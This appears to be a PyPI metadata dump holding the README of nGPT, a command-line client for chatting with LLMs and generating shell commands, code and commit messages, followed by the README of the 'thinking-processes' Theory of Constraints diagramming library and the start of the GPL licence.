- 🪶 **Lightweight**: Minimal dependencies with everything you need included
- 🔄 **API Flexibility**: Works with OpenAI, Ollama, Groq, Claude, Gemini, and any OpenAI-compatible endpoint
- 💬 **Interactive Chat**: Continuous conversation with memory in modern UI
- 📊 **Streaming Responses**: Real-time output for better user experience
- 🔍 **Web Search**: Enhance any model with contextual information from the web, using advanced content extraction to identify the most relevant information from web pages
- 📥 **Stdin Processing**: Process piped content by using `{}` placeholder in prompts
- 🎨 **Markdown Rendering**: Beautiful formatting of markdown and code with syntax highlighting
- ⚡ **Real-time Markdown**: Stream responses with live updating syntax highlighting and formatting
- ⚙️ **Multiple Configurations**: Cross-platform config system supporting different profiles
- 💻 **Shell Command Generation**: OS-aware command execution
- 🧠 **Text Rewriting**: Improve text quality while maintaining original tone and meaning
- 🧩 **Clean Code Generation**: Output code without markdown or explanations
- 📝 **Rich Multiline Editor**: Interactive multiline text input with syntax highlighting and intuitive controls
- 📑 **Git Commit Messages**: AI-powered generation of conventional, detailed commit messages from git diffs
- 🎭 **System Prompts**: Customize model behavior with custom system prompts
- 🤖 **Custom Roles**: Create and use reusable AI roles for specialized tasks
- 📃 **Conversation Logging**: Save your conversations to text files for later reference
- 💾 **Session Management**: Save, load, and list interactive chat sessions with advanced session manager
- 🔌 **Modular Architecture**: Well-structured codebase with clean separation of concerns
- 🔄 **Provider Switching**: Easily switch between different LLM providers with a single parameter
- 🚀 **Performance Optimized**: Fast response times and minimal resource usage
See the [Feature Overview](https://nazdridoy.github.io/ngpt/overview/) for more details.
## Table of Contents
- [Features](#features)
- [Installation](#installation)
- [Quick Start](#quick-start)
- [Usage](#usage)
- [Command Line Options](#command-line-options)
- [Documentation](#documentation)
- [Configuration](#configuration)
- [API Key Setup](#api-key-setup)
- [OpenAI API Key](#openai-api-key)
- [Google Gemini API Key](#google-gemini-api-key)
- [CLI Configuration](#cli-configuration)
- [Interactive Configuration](#interactive-configuration)
- [Configuration File](#configuration-file)
- [Configuration Priority](#configuration-priority)
- [Contributing](#contributing)
- [License](#license)
## Installation
```bash
# Installation with pip
pip install ngpt
# Or install with uv (faster installation)
uv pip install ngpt
# Or install globally as a CLI tool (recommended for command-line usage)
uv tool install ngpt
# Arch Linux: install from AUR
paru -S ngpt
```
Requires Python 3.8 or newer.
For detailed installation instructions, see the [Installation Guide](https://nazdridoy.github.io/ngpt/installation/).
## Quick Start
```bash
# Chat with default settings
ngpt "Tell me about quantum computing"
# Alternatively, run as a Python module
python -m ngpt "Tell me about quantum computing"
# Start an interactive chat session with conversation memory
ngpt -i
# Inside interactive mode, you can use commands like:
# /editor - Open multiline editor for complex inputs
# /exit - Exit the session (also 'exit', 'quit', 'bye' without '/')
# /help - Show help menu
# /reset - Reset the conversation
# /sessions - Manage saved sessions
# /transcript - Show recent conversation exchanges
# Keyboard shortcuts:
# Ctrl+E - Open multiline editor for complex inputs
# Ctrl+C - Exit the session
# ↑/↓ - Navigate command history
# Session management improvements:
# - Commands like preview, load, rename, delete now default to the latest session
# - Example: 'load' (loads the latest session) vs 'load 2' (loads session at index 2)
# Return response without streaming
ngpt --plaintext "Tell me about quantum computing"
# Generate code (with real-time syntax highlighting by default)
ngpt --code "function to calculate the Fibonacci sequence"
# Generate code without streaming or markdown rendering
ngpt --code --plaintext "function to calculate the Fibonacci sequence"
# Generate and execute shell commands
ngpt --shell "list all files in the current directory"
# Read from stdin and use the content in your prompt
echo "What is this text about?" | ngpt --pipe "Analyze the following text: {}"
# Use interactive multiline editor to enter a command description (when no argument is provided)
ngpt -s
# Use interactive multiline editor to enter code description (when no argument is provided)
ngpt -c
# Pipe a command description to shell mode
echo "list all files" | ngpt -s
# Pipe a code description to code mode
echo "create a python request" | ngpt -c --language python
# Using here-string (<<<) for quick single-line input
ngpt --pipe {} <<< "What is the best way to learn shell redirects?"
# Using standard input redirection to process file contents
ngpt --pipe "summarise {}" < README.md
# Using here-document (<<EOF) for multiline input
ngpt --pipe {} << EOF
What is the best way to learn Golang?
Provide simple hello world example.
EOF
# Create a custom role for specialized tasks
ngpt --role-config create json_generator
# Use a custom role for specific tasks
ngpt --role json_generator "Generate user data with name, email, and address"
# Use a role from the Role Gallery (first create it, then use it)
ngpt --role-config create sql_expert
# Paste the SQL Expert role from https://nazdridoy.github.io/ngpt/examples/role-gallery/
ngpt --role sql_expert "Write a query to find all users who made a purchase in the last 30 days"
# Rewrite text to improve quality while preserving tone and meaning
echo "your text" | ngpt -r
# Rewrite text from a command-line argument
ngpt -r "your text to rewrite"
# Use interactive multiline editor if no argument is provided
ngpt -r
# Rewrite text from a file
cat file.txt | ngpt -r
# Generate AI-powered git commit messages for staged changes
ngpt -g
# Generate commit message from staged changes with a context directive
ngpt -g --preprompt "type:feat"
# Process large diffs in chunks with recursive analysis
ngpt -g --rec-chunk
# Process a diff file instead of staged changes
ngpt -g --diff /path/to/changes.diff
# Use piped diff content for commit message generation
git diff HEAD~1 | ngpt -g --pipe
# Generate a commit message with logging for debugging
ngpt -g --log commit_log.txt
# Display markdown responses with real-time formatting (default)
ngpt "Explain markdown syntax with examples"
# Display responses without markdown rendering
ngpt --plaintext "Explain markdown syntax with examples"
# Use multiline editor for complex prompts
ngpt --text
# Use custom system prompt
ngpt --preprompt "You are a Linux expert" "How do I find large files?"
# Log your conversation to a file
ngpt --interactive --log conversation.log
# Create a temporary log file automatically
ngpt --log "Tell me about quantum computing"
# Process text from stdin using the {} placeholder
cat README.md | ngpt --pipe "Summarize this document: {}"
# Use different model providers by specifying the provider name
ngpt --provider Groq "Explain quantum computing"
# Compare outputs from different providers
ngpt --provider OpenAI --plaintext "Explain quantum physics" > openai_response.txt
ngpt --provider Ollama --plaintext "Explain quantum physics" > ollama_response.txt
# Show all API configurations
ngpt --show-config --all
# List available models for the active configuration
ngpt --list-models
# List models for a specific configuration (index)
ngpt --list-models --config-index 1
# List models for a specific configuration (provider)
ngpt --list-models --provider Gemini
# With custom options
ngpt --api-key your-key --base-url http://your-endpoint --model your-model "Hello"
# Enable web search capability to enhance prompts with web information
ngpt --web-search "What's the latest news about AI?"
# Generate and execute shell commands (using -s or --shell flag)
# OS-aware: generates appropriate commands for Windows, macOS, or Linux
ngpt -s "list all files in current directory"
# On Windows generates: dir
# On Linux/macOS generates: ls -la
# Generate code (using -c or --code flag)
ngpt -c "create a python function that calculates fibonacci numbers"
# Use multiline text editor for complex prompts (using -t or --text flag)
ngpt -t
```
For more examples and detailed usage, visit the [CLI Usage Guide](https://nazdridoy.github.io/ngpt/usage/cli_usage/).
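Several of the quick-start examples above pipe content into nGPT with `--pipe` and a `{}` placeholder. Conceptually this is just a string substitution; a rough sketch of the idea (illustrative only, not nGPT's actual implementation — the function name is made up):

```python
def apply_pipe_placeholder(prompt: str, stdin_text: str) -> str:
    """Substitute piped stdin content for the {} placeholder (illustrative sketch)."""
    return prompt.replace("{}", stdin_text)
```

So `cat README.md | ngpt --pipe "Summarize this document: {}"` sends a prompt with the file contents embedded at the `{}` position.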
## Usage
### Command Line Options
```console
❯ ngpt -h
usage: ngpt [-h] [-v] [--api-key API_KEY] [--base-url BASE_URL] [--model MODEL] [--web-search] [--pipe]
[--temperature TEMPERATURE] [--top_p TOP_P] [--max_tokens MAX_TOKENS] [--log [FILE]]
[--preprompt PREPROMPT | --role ROLE] [--config [CONFIG]] [--config-index CONFIG_INDEX]
[--provider PROVIDER] [--remove] [--show-config] [--list-models] [--cli-config [COMMAND ...]]
[--role-config [ACTION ...]] [--plaintext] [--language LANGUAGE] [--rec-chunk] [--diff [FILE]]
[--chunk-size CHUNK_SIZE] [--analyses-chunk-size ANALYSES_CHUNK_SIZE] [--max-msg-lines MAX_MSG_LINES]
[--max-recursion-depth MAX_RECURSION_DEPTH] [--humanize] [-i | -s | -c | -t | -r | -g]
[prompt]
nGPT - AI-powered terminal toolkit for code, commits, commands & chat
positional arguments:
[PROMPT] The prompt to send to the language model
Global Options:
-h, --help show this help message and exit
-v, --version Show version information and exit
--api-key API_KEY API key for the service
--base-url BASE_URL Base URL for the API
--model MODEL Model to use
--web-search Enable web search capability using DuckDuckGo to enhance prompts with relevant
information
--pipe Read from stdin and use content with prompt. Use {} in prompt as placeholder
for stdin content. Can be used with any mode option except --text and
--interactive
--temperature TEMPERATURE Set temperature (controls randomness, default: 0.7)
--top_p TOP_P Set top_p (controls diversity, default: 1.0)
--max_tokens MAX_TOKENS Set max response length in tokens
--log [FILE] Set filepath to log conversation to, or create a temporary log file if no path
provided
--preprompt PREPROMPT Set custom system prompt to control AI behavior
--role ROLE Use a predefined role to set system prompt (mutually exclusive with
--preprompt)
Configuration Options:
--config [CONFIG] Path to a custom config file or, if no value provided, enter interactive
configuration mode to create a new config
--config-index CONFIG_INDEX Index of the configuration to use or edit (default: 0)
--provider PROVIDER Provider name to identify the configuration to use
--remove Remove the configuration at the specified index (requires --config and
--config-index or --provider)
--show-config Show the current configuration(s) and exit
--list-models List all available models for the current configuration and exit
--cli-config [COMMAND ...] Manage CLI configuration (set, get, unset, list, help)
--role-config [ACTION ...] Manage custom roles (help, create, show, edit, list, remove) [role_name]
Output Display Options:
--plaintext Disable streaming and markdown rendering (plain text output)
Code Mode Options:
--language LANGUAGE Programming language to generate code in (for code mode)
Git Commit Message Options:
--rec-chunk Process large diffs in chunks with recursive analysis if needed
--diff [FILE] Use diff from specified file instead of staged changes. If used without a path,
uses the path from CLI config.
--chunk-size CHUNK_SIZE Number of lines per chunk when chunking is enabled (default: 200)
--analyses-chunk-size ANALYSES_CHUNK_SIZE
Number of lines per chunk when recursively chunking analyses (default: 200)
--max-msg-lines MAX_MSG_LINES Maximum number of lines in commit message before condensing (default: 20)
--max-recursion-depth MAX_RECURSION_DEPTH
Maximum recursion depth for commit message condensing (default: 3)
Rewrite Mode Options:
--humanize Transform AI-generated text into human-like content that passes AI detection
tools
Modes (mutually exclusive):
-i, --interactive Start an interactive chat session
-s, --shell Generate and execute shell commands
-c, --code Generate code
-t, --text Enter multi-line text input (submit with Ctrl+D)
-r, --rewrite Rewrite text from stdin to be more natural while preserving tone and meaning
-g, --gitcommsg Generate AI-powered git commit messages from staged changes or diff file
```
> **Note**: For better visualization of conventional commit messages on GitHub, you can use the [GitHub Commit Labels](https://greasyfork.org/en/scripts/526153-github-commit-labels) userscript, which adds colorful labels to your commits.
For a complete reference of all available options, detailed CLI examples and usage information, see the [CLI Usage Guide](https://nazdridoy.github.io/ngpt/usage/cli_usage/).
## Documentation
Comprehensive documentation, including usage guides and examples, is available at:
**[https://nazdridoy.github.io/ngpt/](https://nazdridoy.github.io/ngpt/)**
Key documentation sections:
- [Installation Guide](https://nazdridoy.github.io/ngpt/installation/)
- [CLI Usage Guide](https://nazdridoy.github.io/ngpt/usage/cli_usage/)
- [Configuration Guide](https://nazdridoy.github.io/ngpt/configuration/)
- [Custom Roles Guide](https://nazdridoy.github.io/ngpt/usage/roles/)
- [Role Gallery](https://nazdridoy.github.io/ngpt/examples/role-gallery/)
- [Examples & Tutorials](https://nazdridoy.github.io/ngpt/examples/basic/)
- [Git Commit Message Guide](https://nazdridoy.github.io/ngpt/usage/gitcommsg/)
## Configuration
### API Key Setup
#### OpenAI API Key
1. Create an account at [OpenAI](https://platform.openai.com/)
2. Navigate to API keys: https://platform.openai.com/api-keys
3. Click "Create new secret key" and copy your API key
4. Configure nGPT with your key:
```bash
ngpt --config
# Enter provider: OpenAI
# Enter API key: your-openai-api-key
# Enter base URL: https://api.openai.com/v1/
# Enter model: gpt-3.5-turbo (or other model)
```
#### Google Gemini API Key
1. Create or use an existing Google account
2. Go to [Google AI Studio](https://aistudio.google.com/)
3. Navigate to API keys in the left sidebar (or visit https://aistudio.google.com/app/apikey)
4. Create an API key and copy it
5. Configure nGPT with your key:
```bash
ngpt --config
# Enter provider: Gemini
# Enter API key: your-gemini-api-key
# Enter base URL: https://generativelanguage.googleapis.com/v1beta/openai
# Enter model: gemini-2.0-flash
```
For more detailed information, refer to the [API Key Setup documentation](https://nazdridoy.github.io/ngpt/configuration/#api-key-setup).
### CLI Configuration
nGPT offers a CLI configuration system that allows you to set default values for command-line options. This is especially useful when you:
- Repeatedly use the same provider or model
- Have preferred settings for specific tasks
- Want to create different workflows based on context
For example, setting your preferred language for code generation or temperature value means you won't have to specify these parameters each time:
```console
❯ uv run ngpt --cli-config help
CLI Configuration Help:
Command syntax:
ngpt --cli-config help - Show this help message
ngpt --cli-config set OPTION VALUE - Set a default value for OPTION
ngpt --cli-config get OPTION - Get the current value of OPTION
ngpt --cli-config get - Show all CLI configuration settings
ngpt --cli-config unset OPTION - Remove OPTION from configuration
ngpt --cli-config list - List all available options with types and defaults
Available options:
General options (all modes):
config-index - Type: int (default: 0)
log - Type: str (default: None)
max_tokens - Type: int (default: None)
preprompt - Type: str (default: None)
provider - Type: str (default: None)
temperature - Type: float (default: 0.7)
top_p - Type: float (default: 1.0)
web-search - Type: bool (default: False)
Code mode options (-c/--code):
language - Type: str (default: python)
Git commit message options (-g/--gitcommsg):
analyses-chunk-size - Type: int (default: 200)
chunk-size - Type: int (default: 200)
diff - Type: str (default: None)
max-msg-lines - Type: int (default: 20)
max-recursion-depth - Type: int (default: 3)
rec-chunk - Type: bool (default: False)
Example usage:
ngpt --cli-config set language java - Set default language to java for code generation
ngpt --cli-config set temperature 0.9 - Set default temperature to 0.9
ngpt --cli-config set rec-chunk true - Enable recursive chunking for git commit messages
ngpt --cli-config set diff /path/to/file.diff - Set default diff file for git commit messages
ngpt --cli-config get temperature - Check the current temperature setting
ngpt --cli-config get - Show all current CLI settings
ngpt --cli-config unset language - Remove language setting
Notes:
- CLI configuration is stored in:
• Linux: ~/.config/ngpt/ngpt-cli.conf
• macOS: ~/Library/Application Support/ngpt/ngpt-cli.conf
• Windows: %APPDATA%\ngpt\ngpt-cli.conf
- Settings are applied based on context (e.g., language only applies to code generation mode)
- Command-line arguments always override CLI configuration
- Some options are mutually exclusive and will not be applied together
```
For more details, see the [CLI Configuration Guide](https://nazdridoy.github.io/ngpt/usage/cli_config/).
### Interactive Configuration
The `--config` option without arguments enters interactive configuration mode, allowing you to add or edit configurations:
```bash
# Add a new configuration
ngpt --config
# Edit an existing configuration at index 1
ngpt --config --config-index 1
# Edit an existing configuration by provider name
ngpt --config --provider Gemini
# Remove a configuration at index 2
ngpt --config --remove --config-index 2
# Remove a configuration by provider name
ngpt --config --remove --provider Gemini
# Use a specific configuration by provider name
ngpt --provider OpenAI "Tell me about quantum computing"
```
In interactive mode:
- When editing an existing configuration, press Enter to keep the current values
- When creating a new configuration, press Enter to use default values
- For security, your API key is not displayed when editing configurations
- When removing a configuration, you'll be asked to confirm before deletion

For more details on configuring nGPT, see the [Configuration Guide](https://nazdridoy.github.io/ngpt/configuration/).
### Configuration File
nGPT uses a configuration file stored in the standard user config directory for your operating system:
- **Linux**: `~/.config/ngpt/ngpt.conf` or `$XDG_CONFIG_HOME/ngpt/ngpt.conf`
- **macOS**: `~/Library/Application Support/ngpt/ngpt.conf`
- **Windows**: `%APPDATA%\ngpt\ngpt.conf`
The configuration file uses a JSON list format, allowing you to store multiple configurations. You can select which configuration to use with the `--config-index` argument (or by default, index 0 is used).
#### Multiple Configurations Example (`ngpt.conf`)
```json
[
  {
    "api_key": "your-openai-api-key-here",
    "base_url": "https://api.openai.com/v1/",
    "provider": "OpenAI",
    "model": "gpt-4o"
  },
  {
    "api_key": "your-groq-api-key-here",
    "base_url": "https://api.groq.com/openai/v1/",
    "provider": "Groq",
    "model": "llama3-70b-8192"
  },
  {
    "api_key": "your-ollama-key-if-needed",
    "base_url": "http://localhost:11434/v1/",
    "provider": "Ollama-Local",
    "model": "llama3"
  }
]
```
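Since the file is a plain JSON list, selecting a configuration by index is a straightforward lookup. A minimal sketch of reading it (illustrative only — the helper name is made up, and this is not nGPT's internal code):

```python
import json
from pathlib import Path

def load_ngpt_config(path: Path, index: int = 0) -> dict:
    """Read a JSON list of configurations and return the entry at `index` (illustrative)."""
    configs = json.loads(Path(path).read_text())
    if not 0 <= index < len(configs):
        raise IndexError(f"no configuration at index {index} (found {len(configs)})")
    return configs[index]
```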
For details on the configuration file format and structure, see the [Configuration Guide](https://nazdridoy.github.io/ngpt/configuration/).
### Configuration Priority
nGPT determines configuration values in the following order (highest priority first):
1. Command line arguments (`--api-key`, `--base-url`, `--model`, etc.)
2. Environment variables (`OPENAI_API_KEY`, `OPENAI_BASE_URL`, `OPENAI_MODEL`)
3. CLI configuration file (`ngpt-cli.conf`, managed with `--cli-config`)
4. Main configuration file `ngpt.conf` or `custom-config-file`
5. Default values
**Tip:** Use `ngpt --show-config` to see which configuration values are being used and their sources (command-line arguments, environment variables, or configuration file).
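The priority order above amounts to a first-match lookup across the five sources. A conceptual sketch (the function and its plain-dict sources are illustrative, not nGPT's code):

```python
def resolve_option(option, cli_args, env_vars, cli_config, main_config, defaults):
    """Return the value from the highest-priority source that defines `option`."""
    for source in (cli_args, env_vars, cli_config, main_config, defaults):
        if source.get(option) is not None:
            return source[option]
    return None
```

For example, a `--model` flag would win over an `OPENAI_MODEL` environment variable, which in turn would win over the configuration files.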
### Real-World Demonstrations with nGPT
Let's see nGPT in action! Here are some practical ways you can use it every day:
#### Quick Q&A and Coding
```bash
# Get a quick explanation
ngpt "Explain the difference between threads and processes in Python"
# Generate code with real-time syntax highlighting
ngpt --code "Write a Python function to reverse a linked list"
```
With the `--code` flag, nGPT gives you clean code without explanations or markdown, just what you need to copy and paste into your project. By default, it shows real-time syntax highlighting as the code comes in.
#### Shell Command Generation (OS-Aware)
```bash
# Let nGPT generate the correct command for your OS
ngpt --shell "list all files in the current directory including hidden ones"
# Or use the multiline editor if you have a complex request
ngpt -s
# On Linux/macOS: ls -la
# On Windows: dir /a
```
One of my favorite features! No more Googling obscure command flags, nGPT generates the right command for your operating system. It'll even execute it for you if you approve.

#### Text Rewriting and Summarization
```bash
# Pipe text to rewrite it (e.g., improve clarity)
echo "This is a rough draft of my email." | ngpt -r
# Summarize a file using the pipe placeholder
cat long-article.txt | ngpt --pipe "Summarize this document concisely: {}"
```
The text rewriting feature is perfect for quickly improving documentation, emails, or reports. And with pipe placeholders, you can feed in content from files or other commands.
#### Git Commit Message Generation
```bash
# Stage your changes
git add .
# Let nGPT generate a conventional commit message based on the diff
ngpt -g
# Generate git commit message from a diff file
ngpt -g --diff changes.diff
```
This is a huge time-saver. nGPT analyzes your git diff and generates a properly formatted conventional commit message that actually describes what you changed. No more staring at the blank commit message prompt!
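For very large diffs, the `--rec-chunk` option shown earlier processes the diff in fixed-size line chunks (200 lines by default, per `--chunk-size`). The splitting step can be sketched roughly like this (illustrative only, not nGPT's actual code):

```python
def chunk_diff(diff_text, chunk_size=200):
    """Split a diff into chunks of at most chunk_size lines (illustrative sketch)."""
    lines = diff_text.splitlines()
    return ["\n".join(lines[i:i + chunk_size])
            for i in range(0, len(lines), chunk_size)]
```

Each chunk is then analyzed separately, and the analyses are condensed into a single commit message.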

#### Custom AI Roles
```bash
# Create a specialized role for JSON generation
ngpt --role-config create json_generator
# Use the custom role to generate structured data
ngpt --role json_generator "Generate random user profile data"
```
```json
{
  "id": "a1b2c3d4-e5f6-7890-1234-567890abcdef",
  "firstName": "Aurora",
  "lastName": "Reynolds",
  "email": "aurora.reynolds@example.com",
  "phone": "+1-555-0101",
  "address": {
    "street": "123 Main St",
    "city": "Anytown",
    "state": "CA",
    "zipCode": "90210"
  },
  "birthDate": "1990-07-15",
  "registrationDate": "2022-01-20",
  "isActive": true,
  "roles": [
    "user",
    "premium"
  ]
}
```
Custom roles allow you to create reusable AI personas for consistent responses across various prompts. For more details, see the [Custom Roles Guide](https://nazdridoy.github.io/ngpt/usage/roles/) and check out the [Role Gallery](https://nazdridoy.github.io/ngpt/examples/role-gallery/) for ready-to-use roles.
#### Web Search Integration
```bash
# Ask questions that require up-to-date information
ngpt --web-search "What's the latest news about AI regulation?"
```
The `--web-search` flag lets nGPT consult the web for recent information, making it useful for questions about current events or topics that might have changed since the AI's training data cutoff.

### Real-World Integration Examples
Let's look at how nGPT can fit into your everyday workflow with some practical examples:
#### Developer Workflow
As a developer, I use nGPT throughout my day:
**Morning code review**:
```bash
# Get explanations of complex code
git show | ngpt --pipe "Explain what this code change does and any potential issues: {}"
```
**Debugging help**:
```bash
# Help understand a cryptic error message
npm run build 2>&1 | grep Error | ngpt --pipe "What does this error mean and how can I fix it: {}"
```
**Documentation generation**:
```bash
# Generate JSDoc comments for functions
cat src/utils.js | ngpt --pipe "Write proper JSDoc comments for these functions: {}"
```
**Commit messages**:
```bash
# After finishing a feature
git add .
ngpt -g
```
#### Writer's Assistant
For content creators and writers:
**Overcoming writer's block**:
```bash
ngpt "Give me 5 different angles to approach an article about sustainable technology"
```
**Editing assistance**:
```bash
cat draft.md | ngpt -r
```
**Research summaries**:
```bash
curl -s https://example.com/research-paper.html | ngpt --pipe "Summarize the key findings from this research: {}"
```
#### System Administrator
For sysadmins and DevOps folks:
**Generating complex commands**:
```bash
ngpt -s "find all log files larger than 100MB that haven't been modified in the last 30 days"
```
**Creating configuration files**:
```bash
ngpt --code "Create a Docker Compose file for a Redis, PostgreSQL, and Node.js application"
```
**Troubleshooting systems**:
```bash
dmesg | tail -50 | ngpt --pipe "Explain what might be causing the issues based on these system logs: {}"
```
## Contributing
We welcome contributions to nGPT! Whether it's bug fixes, feature additions, or documentation improvements, your help is appreciated.
To contribute:
1. Fork the repository
2. Create a feature branch: `git checkout -b feature/your-feature-name`
3. Make your changes
4. Commit with clear messages following conventional commit guidelines
5. Push to your fork and submit a pull request
Please check the [CONTRIBUTING.md](CONTRIBUTING.md) file for detailed guidelines on code style, pull request process, and development setup.
## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
| text/markdown | null | nazDridoy <nazdridoy399@gmail.com> | null | null | MIT | ai, api-client, chatbot, chatgpt, claude, cli, cli-tool, code-generation, git-commit, gpt, groq, llm, markdown-rendering, ollama, openai, shell-commands, text-rewriting | [
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: End Users/Desktop",
"Intended Audience :: System Administrators",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Communications :: Chat",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Utilities"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"beautifulsoup4>=4.12.0",
"prompt-toolkit>=3.0.0",
"pyperclip>=1.8.0",
"requests>=2.31.0",
"rich>=10.0.0"
] | [] | [] | [] | [
"Homepage, https://github.com/nazdridoy/ngpt",
"Repository, https://github.com/nazdridoy/ngpt",
"Bug Tracker, https://github.com/nazdridoy/ngpt/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:38:09.829873 | ngpt-6.8.0.tar.gz | 693,969 | 66/4b/05a1c4f37a1e560023d656192f7702099bf26b4ad63f52d50cbaad866b55/ngpt-6.8.0.tar.gz | source | sdist | null | false | ffaa448b2d9f467f43d25c5092a5b6f9 | 49bbd1ff8771499b77dba0915e88afaa0b1210f2b73b261f2088c749edf382c2 | 664b05a1c4f37a1e560023d656192f7702099bf26b4ad63f52d50cbaad866b55 | null | [
"LICENSE"
] | 221 |
2.4 | thinking-processes | 1.5.1 | Diagramming tools for the Thinking Processes from the Theory of Constraints | # Thinking Processes
This Python package helps you to draw diagrams used in the Thinking Processes from the Theory of Constraints.
For more information, see https://en.wikipedia.org/wiki/Thinking_processes_(theory_of_constraints)
### Prerequisites
- Python 3.11+
- Ensure [Graphviz](https://www.graphviz.org/) is installed and available in your PATH.
### Installing
```bash
pip install thinking-processes
```
### Current Reality Tree
In this example, we find root causes for undesired effects by drawing a Current Reality Tree:
```python
from thinking_processes import CurrentRealityTree
crt = CurrentRealityTree()
engine_not_start = crt.add_node("Car's engine will not start")
engine_needs_fuel = crt.add_node('Engine needs fuel in order to run')
no_fuel_to_engine = crt.add_node('Fuel is not getting to the engine')
water_in_fuel_line = crt.add_node('There is water in the fuel line')
crt.add_causal_relation([engine_needs_fuel, no_fuel_to_engine], engine_not_start)
crt.add_causal_relation([water_in_fuel_line], no_fuel_to_engine)
air_conditioning_not_working = crt.add_node('Air conditioning is not working')
air_not_circulating = crt.add_node('Air is not able to circulate')
air_intake_full_of_water = crt.add_node('The air intake is full of water')
crt.add_causal_relation([air_not_circulating], air_conditioning_not_working)
crt.add_causal_relation([air_intake_full_of_water], air_not_circulating)
radio_distorted = crt.add_node('Radio sounds distorted')
speakers_obstructed = crt.add_node('The speakers are obstructed')
speakers_underwater = crt.add_node('The speakers are underwater')
crt.add_causal_relation([speakers_obstructed], radio_distorted)
crt.add_causal_relation([speakers_underwater], speakers_obstructed)
car_in_pool = crt.add_node('The car is in the swimming pool')
crt.add_causal_relation([car_in_pool], speakers_underwater)
crt.add_causal_relation([car_in_pool], air_intake_full_of_water)
crt.add_causal_relation([car_in_pool], water_in_fuel_line)
handbrake_faulty = crt.add_node('The handbrake is faulty')
handbrake_stops_car = crt.add_node('The handbrake stops the car from rolling into the swimming pool')
crt.add_causal_relation([handbrake_faulty, handbrake_stops_car], car_in_pool)
crt.plot(view=True, filepath='crt.png')
```
The resulting tree looks like this:

To save some effort in typing, you can create the same diagram using a string representation of the tree:
```python
from thinking_processes import CurrentRealityTree
crt = CurrentRealityTree.from_string("""
1: Car's engine will not start
2: Engine needs fuel in order to run
3: Fuel is not getting to the engine
4: There is water in the fuel line
5: Air conditioning is not working
6: Air is not able to circulate
7: The air intake is full of water
8: Radio sounds distorted
9: The speakers are obstructed
10: The speakers are underwater
11: The car is in the swimming pool
12: The handbrake is faulty
13: The handbrake stops the car from rolling into the swimming pool
2,3 -> 1
4 -> 3
6 => 5
7 -> 6
9 -> 8
10 -> 9
10 <= 11
11 <- 12 13
11 -> 7
11 -> 4
""")
```
### Evaporating Cloud (Conflict Resolution Diagram)
In this example, we resolve a conflict by identifying wrong assumptions behind the conflict:
```python
from thinking_processes import EvaporatingCloud
ec = EvaporatingCloud(
    objective='Reduce cost per unit',
    need_a='Reduce setup cost per unit',
    need_b='Reduce carrying cost per unit',
    conflict_part_a='Run larger batches',
    conflict_part_b='Run smaller batches'
)
ec.add_assumption_on_the_conflict('small is the opposite of large', is_true=True)
ec.add_assumption_on_the_conflict('there is only one meaning to the word "batch"', is_true=False)
ec.add_assumption_on_need_a("setup cost is fixed and can't be reduced")
ec.add_assumption_on_need_a("the machine being set up is a bottleneck with no spare capacity")
ec.add_assumption_on_need_b("smaller batches reduce carrying cost")
ec.plot(view=True, filepath='ec.png')
```
The resulting diagram looks like this:

### Prerequisite Tree
In this example, we identify and overcome obstacles to achieve a goal:
```python
from thinking_processes import PrerequisiteTree
prt = PrerequisiteTree(objective='Repair the handbrake')
missing_knowledge = prt.add_obstacle('Cannot repair the handbrake')
learn = missing_knowledge.add_solution('Learn to repair the handbrake')
learn.add_obstacle('No time to learn')
let_repair = missing_knowledge.add_solution('Let someone else repair the handbrake')
no_money = let_repair.add_obstacle('No money to let repair the handbrake')
no_money.add_solution('Save money')
prt.plot(view=True, filepath='prt.png')
```
The resulting diagram looks like this:

Alternatively, you can create the same diagram using a string representation of the tree:
```python
from thinking_processes import PrerequisiteTree
prt = PrerequisiteTree.from_string("""
Repair the handbrake
    Cannot repair the handbrake
        Learn to repair the handbrake
            No time to learn
        Let someone else repair the handbrake
            No money to let repair the handbrake
                Save money
""")
```
## Development
These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.
### Running the tests
All tests in the `tests` directory are based on the standard `unittest` package.
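Assuming the standard layout, the suite can be run with unittest's test discovery (command is illustrative of the usual workflow):

```shell
# Discover and run all tests in the tests directory
python -m unittest discover -s tests -v
```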
### Deployment
To build the source distribution and publish it to PyPI, run:
```bash
# Remove previous build artifacts, then build and upload.
rm -rf dist thinking_processes.egg-info
python -m build && twine upload --skip-existing --verbose dist/*
```
You should also create a Git tag for the current version:
```bash
git tag -a [version] -m "describe what has changed"
git push --tags
```
## Versioning
We use [SemVer](https://semver.org/) for versioning.
## Authors
If you have any questions, feel free to ask one of our authors:
* **Boris Wiegand** - boris.wiegand@stahl-holding-saar.de
| text/markdown | null | Boris Wiegand <boris.wiegand@stahl-holding-saar.de> | null | null | GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/> Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU General Public License is a free, copyleft license for software and other kinds of works. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. 
